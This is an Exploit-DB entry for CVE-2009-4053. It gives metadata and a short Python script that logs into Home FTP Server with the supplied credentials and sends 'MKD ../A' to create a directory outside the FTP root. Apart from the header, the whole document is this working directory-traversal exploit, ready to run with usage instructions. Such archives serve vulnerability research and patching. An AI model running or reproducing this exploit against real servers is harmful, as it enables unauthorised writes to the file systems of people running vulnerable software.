Home FTP Server - 'MKD' Directory Traversal
Author: zhangmc
type: remote
platform: windows
port: 21.0
date_added: 2009-11-16
date_updated:
verified: 1
codes: CVE-2009-4053;OSVDB-60449
tags:
aliases:
screenshot_url:
application_url: http://www.exploit-db.comHomeFtpServerInstall.exe
#!/usr/bin/python
import socket
import sys
def Usage():
print ("Usage: ./expl.py <serv_ip> <Username> <password>\n")
print ("Example:./expl.py 192.168.48.183 anonymous anonymous\n")
if len(sys.argv) <> 4:
Usage()
sys.exit(1)
else:
hostname=sys.argv[1]
username=sys.argv[2]
passwd=sys.argv[3]
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.connect((hostname, 21))
except:
print ("Connection error!")
sys.exit(1)
r=sock.recv(1024)
sock.send("user %s\r\n" %username)
r=sock.recv(1024)
sock.send("pass %s\r\n" %passwd)
r=sock.recv(1024)
sock.send("MKD ../A\r\n")
sock.close()
sys.exit(0);